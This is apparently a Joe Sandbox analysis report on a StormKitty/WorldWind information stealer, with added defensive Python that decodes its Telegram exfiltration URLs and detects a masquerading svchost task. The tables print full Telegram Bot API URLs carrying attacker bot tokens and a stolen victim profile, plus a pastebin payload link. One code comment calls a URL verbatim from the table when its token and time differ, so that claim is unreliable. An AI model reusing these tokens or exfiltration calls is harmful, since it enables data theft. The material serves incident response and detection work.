https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-06-28%205:19:44%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20888683%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20KV_WO1B1%0ARAM:%204095MB%0AHWID:%20E63C35380D%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True | false | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendDocument?chat_id=5795480469 | false | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... | false | 1% (Virustotal); Avira URL Cloud: safe | unknown
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 | false | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283662956 | false | 0% (Virustotal); Avira URL Cloud: safe | unknown
https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... | false | Avira URL Cloud: safe | unknown
https://pastebin.com/raw/7B75u64B | false | Avira URL Cloud: safe | unknown
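The sendMessage URLs above carry the stealer's whole first-stage report, URL-encoded, in the `text` query parameter: host fingerprint, external IP, BSSID, and the counts of grabbed files. The following is an added example for this page, not code from the Joe Sandbox report or from the malware. It parses those URL strings offline (nothing here contacts Telegram), decodes the exfiltrated report into key/value fields, and pulls out the bot IDs and chat IDs as indicators. The URL strings are copied verbatim from the table; the field names are whatever the decoded message contains.

```python
"""Decode the Telegram Bot API exfiltration URLs listed in the report above.

Added example for this page; not code from the Joe Sandbox report or from the
malware. The URL strings are copied verbatim from the contacted-URLs table and
nothing here contacts Telegram.
"""
import re
from urllib.parse import parse_qs, urlsplit

# First row of the table above, copied verbatim and only split across adjacent
# string literals for readability.
EXFIL_URL = (
    "https://api.telegram.org/bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/"
    "sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro"
    "%20-%20Results:*%0ADate:%202024-06-28%205:19:30%20am%0ASystem:%20Windows%2010"
    "%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20888683%0ALanguage:%20"
    "%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20"
    "%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@"
    "%202.40%20GHz%0AGPU:%20KV_WO1B1%0ARAM:%204095MB%0AHWID:%20E63C35380D%0APower:"
    "%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20"
    "*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network"
    "%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:"
    "%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains"
    "%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A"
    "%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20"
    "%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C"
    "%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88"
    "%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A"
    "%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows"
    "%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A"
    "%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82"
    "%20Database%20files:%206%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045"
    "%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20Telegram%20Channel:"
    "%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True"
)

# Further rows of the same table (the geolocation URL is there as a non-Telegram control).
OTHER_URLS = [
    "https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendDocument?chat_id=5795480469",
    "https://api.telegram.org/bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders...",
    "https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283662956",
    "https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15",
]

# Bot API path layout: /bot<numeric bot id>:<secret>/<method>
BOT_PATH_RE = re.compile(r"/bot(\d+):([A-Za-z0-9_-]+)/(\w+)")


def parse_telegram_exfil(url):
    """Split a Bot API URL into bot id, full token, method, chat_id and decoded text.

    Returns None for anything that is not an api.telegram.org Bot API call.
    parse_qs() performs the percent-decoding, so %0A becomes a newline and the
    UTF-8 emoji sequences become characters.
    """
    parts = urlsplit(url)
    m = BOT_PATH_RE.search(parts.path)
    if parts.hostname != "api.telegram.org" or not m:
        return None
    bot_id, secret, method = m.groups()
    qs = parse_qs(parts.query, keep_blank_values=True)
    return {
        "bot_id": bot_id,
        "token": f"{bot_id}:{secret}",
        "method": method,
        "chat_id": qs.get("chat_id", [None])[0],
        "text": qs.get("text", [""])[0],
    }


def report_fields(text):
    """Turn the decoded 'Key: value' lines of the stealer report into a dict.

    Emoji and tree-drawing prefixes such as '   \u221f \U0001f4c2 Documents' are
    stripped down to the first ASCII letter; first occurrence of a key wins.
    """
    fields = {}
    for line in text.splitlines():
        if ": " not in line:
            continue
        key, value = line.split(": ", 1)
        key = re.sub(r"^[^A-Za-z]+", "", key).strip()
        if key and key not in fields:
            fields[key] = value.strip()
    return fields


def collect_iocs(urls):
    """Deduplicated bot ids and chat ids across every Bot API URL in the list."""
    bots, chats = set(), set()
    for url in urls:
        info = parse_telegram_exfil(url)
        if info:
            bots.add(info["bot_id"])
            if info["chat_id"]:
                chats.add(info["chat_id"])
    return {"bot_ids": sorted(bots), "chat_ids": sorted(chats)}


if __name__ == "__main__":
    info = parse_telegram_exfil(EXFIL_URL)
    for key, value in report_fields(info["text"]).items():
        print(f"{key:18} {value}")
    print(collect_iocs([EXFIL_URL] + OTHER_URLS))
```

The decoded fields are the victim profile the operator received (Username, CompName, HWID, External IP, BSSID, the file counts), which is what an incident responder needs to scope what left the host. Because api.telegram.org itself is shared infrastructure, the bot ID and chat ID are the indicators worth hunting on in proxy logs rather than the domain or its IP.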
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | tmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.dr | false | 0% (Virustotal); Avira URL Cloud: safe | unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF | tmpAE3C.tmp.dat.28.dr | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | tmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.dr | false | 0% (Virustotal); Avira URL Cloud: safe | unknown
https://api.telegram.org | udwnme.exe, 0000000F.00000002.2919317603.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000002.2919317603.0000000003343000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002A85000.00000004.00000800.00020000.00000000.sdmp | true | 1% (Virustotal); Avira URL Cloud: safe | unknown
https://api.telegram.org/bot | luglzv.exe.7.dr | true | 1% (Virustotal); Avira URL Cloud: safe | unknown
https://api.telegram.orgD | luglzv.exe, 0000001C.00000002.2919353202.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | tmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.dr | false | URL Reputation: safe | unknown
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15d | udwnme.exe, 0000000F.00000002.2919317603.000000000323E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | History.txt0.15.dr, tmp763D.tmp.dat.15.dr, tmp762D.tmp.dat.15.dr, tmpAD0B.tmp.dat.28.dr, tmpAD1C.tmp.dat.28.dr, History.txt0.28.dr | false | URL Reputation: safe | unknown
https://pastebin.com/raw/7B75u64Bd | luglzv.exe, 0000001C.00000002.2919353202.0000000002B2E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage?chat_id=57954 | udwnme.exe, 0000000F.00000002.2919317603.0000000003343000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000002.2919317603.00000000032C3000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/LimerBoy/StormKitty | luglzv.exe, 0000001C.00000002.2919353202.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe.7.dr, luglzv.exe.7.dr | false | 2% (Virustotal); Avira URL Cloud: safe | unknown
https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendDocument?chat_id=5795 | luglzv.exe, 0000001C.00000002.2919353202.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | tmp763D.tmp.dat.15.dr, tmp762D.tmp.dat.15.dr, tmpAD0B.tmp.dat.28.dr, tmpAD1C.tmp.dat.28.dr | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | tmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.dr | false | URL Reputation: safe | unknown
https://api.mylnikov.org | udwnme.exe, 0000000F.00000002.2919317603.000000000323E000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002A58000.00000004.00000800.00020000.00000000.sdmp | false | 3% (Virustotal); Avira URL Cloud: safe | unknown
http://api.telegram.orgd | udwnme.exe, 0000000F.00000002.2919317603.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000002.2919317603.0000000003343000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002B62000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://icanhazip.com | udwnme.exe, 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000002.2919317603.000000000323E000.00000004.00000800.00020000.00000000.sdmp | false | 0% (Virustotal); Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | zrrHgsDzgS.exe, 00000000.00000002.1725732577.0000000002A8D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2919350933.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002A2B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283 | luglzv.exe, 0000001C.00000002.2919353202.0000000002B62000.00000004.00000800.00020000.00000000.sdmp | false | 1% (Virustotal); Avira URL Cloud: safe | unknown
https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13 | svchost.exe, 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, udwnme.exe.7.dr, luglzv.exe.7.dr | false | 9% (Virustotal); Avira URL Cloud: safe | unknown
https://github.com/LimerBoy/StormKittyTCfq$ | udwnme.exe, 0000000F.00000002.2919317603.00000000036BB000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | tmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.dr | false | 0% (Virustotal); Avira URL Cloud: safe | unknown
https://github.com/LimerBoy/StormKitty0&nq | udwnme.exe, 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002A16000.00000004.00000800.00020000.00000000.sdmp | false | 3% (Virustotal); Avira URL Cloud: safe | unknown
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid= | udwnme.exe, 0000000F.00000002.2919317603.000000000323E000.00000004.00000800.00020000.00000000.sdmp | false | 1% (Virustotal); Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | tmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.dr | false | 0% (Virustotal); Avira URL Cloud: safe | unknown
http://pastebin.comd | luglzv.exe, 0000001C.00000002.2919353202.0000000002B2E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | History.txt0.15.dr, tmp763D.tmp.dat.15.dr, tmp762D.tmp.dat.15.dr, tmpAD0B.tmp.dat.28.dr, tmpAD1C.tmp.dat.28.dr, History.txt0.28.dr | false | 0% (Virustotal); Avira URL Cloud: safe | unknown
https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendMessage?chat_id=57954 | luglzv.exe, 0000001C.00000002.2919353202.0000000002A85000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | tmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.dr | false | URL Reputation: safe | unknown
http://icanhazip.comd | udwnme.exe, 0000000F.00000002.2919317603.000000000323E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | tmpAE3C.tmp.dat.28.dr | false | URL Reputation: safe | unknown
http://icanhazip.com/t | udwnme.exe, 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp | false | 0% (Virustotal); Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | tmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.dr | false | URL Reputation: safe | unknown
https://api.mylnikov.org/geolocation/wifi?v=1.1& | udwnme.exe, 0000000F.00000002.2919317603.000000000323E000.00000004.00000800.00020000.00000000.sdmp | false | 0% (Virustotal); Avira URL Cloud: safe | unknown
https://api.tele | udwnme.exe, 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage | udwnme.exe, 0000000F.00000002.2919317603.0000000003343000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000002.2919317603.00000000032C3000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://api.telegram.orgd | udwnme.exe, 0000000F.00000002.2919317603.0000000003343000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000002.2919317603.00000000032C3000.00000004.00000800.00020000.00000000.sdmp | false | (none listed) | unknown
https://support.mozilla.org | tmpAE3C.tmp.dat.28.dr | false | URL Reputation: safe | unknown
http://api.mylnikov.orgd | udwnme.exe, 0000000F.00000002.2919317603.00000000032A5000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.telegram.org/file/bot | svchost.exe, 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, udwnme.exe.7.dr, luglzv.exe.7.dr | false | 0% (Virustotal); Avira URL Cloud: safe | unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | tmp763D.tmp.dat.15.dr, tmp762D.tmp.dat.15.dr, tmpAD0B.tmp.dat.28.dr, tmpAD1C.tmp.dat.28.dr | false | Avira URL Cloud: safe | unknown
http://api.telegram.org | udwnme.exe, 0000000F.00000002.2919317603.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000002.2919317603.0000000003343000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002B62000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://api.mylnikov.org | udwnme.exe, 0000000F.00000002.2919317603.00000000032A5000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pastebin.com | luglzv.exe, 0000001C.00000002.2919353202.0000000002B2E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | tmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.dr | false | URL Reputation: safe | unknown
https://pastebin.com | luglzv.exe, 0000001C.00000002.2919353202.0000000002B2E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.44.66 | api.mylnikov.org | United States | 13335 | CLOUDFLARENET (US) | false
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAM (RU) | true
104.20.4.235 | pastebin.com | United States | 13335 | CLOUDFLARENET (US) | true
104.16.184.241 | icanhazip.com | United States | 13335 | CLOUDFLARENET (US) | false
94.232.249.111 | unknown | Syrian Arab Republic | 29256 | INT-PDN-STE-AS STE PDN Internal AS (SY) | true
                      IP
                      127.0.0.1
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1464066
Start date and time: 2024-06-28 11:18:03 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 0s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 39
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: zrrHgsDzgS.exe (renamed because the original name is a hash value)
Original Sample Name: 6d13d147a209e3be044035f0c03b7bde.exe
Detection: MAL
Classification: mal100.rans.troj.spyw.evad.winEXE@60/232@7/6
EGA Information:
• Successful, ratio: 40%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 544
• Number of non-executed functions: 20
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target svchost.exe, PID 3620 because it is empty
• Execution Graph export aborted for target svchost.exe, PID 7060 because it is empty
• Execution Graph export aborted for target zrrHgsDzgS.exe, PID 6452 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may be missing behavior information
• Report size exceeded maximum capacity and may be missing disassembly code
• Report size getting too big: too many NtAllocateVirtualMemory calls found
• Report size getting too big: too many NtOpenKeyEx calls found
• Report size getting too big: too many NtProtectVirtualMemory calls found
• Report size getting too big: too many NtQueryValueKey calls found
• Report size getting too big: too many NtQueryVolumeInformationFile calls found
• Report size getting too big: too many NtReadVirtualMemory calls found
• Some HTTPS proxied raw data packets have been limited to 10 per session. View the PCAPs for the complete data.
Time | Type | Description
05:19:25 | API Interceptor | 8x Sleep call for process: powershell.exe modified
05:19:37 | API Interceptor | 442227x Sleep call for process: udwnme.exe modified
05:19:51 | API Interceptor | 37098x Sleep call for process: luglzv.exe modified
10:19:01 | Task Scheduler | Run new task: svchost path: "C:\Users\user\AppData\Roaming\svchost.exe"
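The Task Scheduler entry above is the persistence step: a task named svchost that runs a binary called svchost.exe from the user's Roaming profile instead of C:\Windows\System32. The check below is an added example for this page, not code from the report or from Joe Sandbox. It parses the report's own timeline wording for Task Scheduler events, normalises the path (case, slash direction) and flags any binary that borrows a Windows system-process name without living in a system directory. The first entry in TASK_EVENTS is the report's line; the rest are constructed, and SYSTEM_NAMES / SYSTEM_DIRS are an assumed, deliberately short allow-list.

```python
"""Flag scheduled tasks whose binary has a Windows system-process name but
does not live in a Windows system directory (the svchost task above).

Added example, not code from the report. The first TASK_EVENTS entry is the
report's own timeline description; the others are constructed. SYSTEM_NAMES
and SYSTEM_DIRS are an assumed, deliberately short allow-list.
"""
import ntpath
import re

# Matches the Joe Sandbox timeline wording: Run new task: <name> path: "<path>"
TASK_RE = re.compile(r'Run new task: (?P<task>\S+) path: "(?P<path>[^"]+)"')

# Assumed allow-list: these names should only ever execute from these directories.
SYSTEM_NAMES = {"svchost.exe", "csrss.exe", "lsass.exe", "winlogon.exe", "explorer.exe"}
SYSTEM_DIRS = {r"c:\windows", r"c:\windows\system32", r"c:\windows\syswow64"}
SYSTEM_DIR_PREFIXES = (r"c:\windows\winsxs",)   # component store, any subfolder

TASK_EVENTS = [
    # From the report timeline (Task Scheduler, 10:19:01).
    r'Run new task: svchost path: "C:\Users\user\AppData\Roaming\svchost.exe"',
    # Constructed benign entries.
    r'Run new task: EdgeUpdate path: "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"',
    r'Run new task: Maintenance path: "C:\WINDOWS\System32\svchost.exe"',
    # Constructed: a subfolder under System32 is not System32.
    r'Run new task: Maintenance2 path: "C:\Windows\System32\Tasks\svchost.exe"',
    # Constructed: forward slashes and upper case must not bypass the check.
    r'Run new task: Updater path: "c:/users/public/SVCHOST.EXE"',
]


def parse_task_event(description):
    """Return (task_name, binary_path) from a timeline description, or None."""
    m = TASK_RE.search(description)
    return (m["task"], m["path"]) if m else None


def is_masquerading(path):
    """True when the file name is a system-process name but its directory is not a system one."""
    norm = ntpath.normpath(path.strip()).lower()      # folds case and / vs \
    if ntpath.basename(norm) not in SYSTEM_NAMES:
        return False
    directory = ntpath.dirname(norm)
    if directory in SYSTEM_DIRS:
        return False
    return not any(directory == p or directory.startswith(p + "\\")
                   for p in SYSTEM_DIR_PREFIXES)


def scan_task_events(events):
    """Return [(task_name, path)] for every event whose binary masquerades."""
    hits = []
    for event in events:
        parsed = parse_task_event(event)
        if parsed and is_masquerading(parsed[1]):
            hits.append(parsed)
    return hits


if __name__ == "__main__":
    for task, path in scan_task_events(TASK_EVENTS):
        print(f"MASQUERADE task={task} path={path}")
```

Exact directory matching matters here: a prefix test on C:\Windows would wave through C:\Windows\Temp\svchost.exe and C:\Windows\System32\Tasks\svchost.exe, both of which are user-writable on a default install.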
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.44.66 | H1XdsfkcgU.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer |
104.21.44.66 | SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe | malicious | AsyncRAT, DcRat, StormKitty, VenomRAT |
104.21.44.66 | t3h7DNer1Q.exe | malicious | AsyncRAT, DcRat |
104.21.44.66 | vp2Gd0kDCt.exe | malicious | AsyncRAT, EICAR, RedLine, StormKitty, VenomRAT |
104.21.44.66 | a.cmd | malicious | Unknown |
104.21.44.66 | UMJLhijN4z.exe | malicious | AsyncRAT, Prynt Stealer, StormKitty, WorldWind Stealer |
104.21.44.66 | HTZ4az17lj.exe | malicious | StormKitty |
104.21.44.66 | ZoominstallerFull.exe | malicious | PureLog Stealer, RedLine, zgRAT |
104.21.44.66 | YVrNKlaWqu.exe | malicious | AsyncRAT, Neshta, StormKitty, WorldWind Stealer |
104.21.44.66 | hesaphareketi-01.pdf.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer |
149.154.167.220 | H1XdsfkcgU.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer |
149.154.167.220 | w5APKwp5DD.exe | malicious | AsyncRAT, HTMLPhisher, MicroClip, StormKitty, WorldWind Stealer |
149.154.167.220 | qRD5vu6vkf.exe | malicious | XWorm |
149.154.167.220 | 245ad05af518252d59b13d1ce0921595767f112513f7b6fdce647f40535c600b_dump.exe | malicious | AgentTesla, PureLog Stealer |
149.154.167.220 | Swift 409452623.88 copy.exe | malicious | AgentTesla, PureLog Stealer |
149.154.167.220 | (PO N 4700001838.pif.exe | malicious | AgentTesla |
149.154.167.220 | new contract.exe | malicious | Snake Keylogger |
149.154.167.220 | chromeUpdate.exe | malicious | Unknown |
149.154.167.220 | 4h4b4EWVNU.exe | malicious | PureLog Stealer, zgRAT |
149.154.167.220 | DHL Shipment Document Original BL Invoice Packing List.exe | malicious | AgentTesla |
104.20.4.235 | New Voicemail Invoice 64746w .js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
104.20.4.235 | Invoice Payment N8977823.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
104.20.4.235 | Pending_Invoice_Bank_Details_XLSX.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
104.20.4.235 | Pending_Invoice_Bank_Details_kofce_.JS.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
104.20.4.235 | Update on Payment.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
Match | Associated Sample Name / URL | Detection | Threat Name | Context
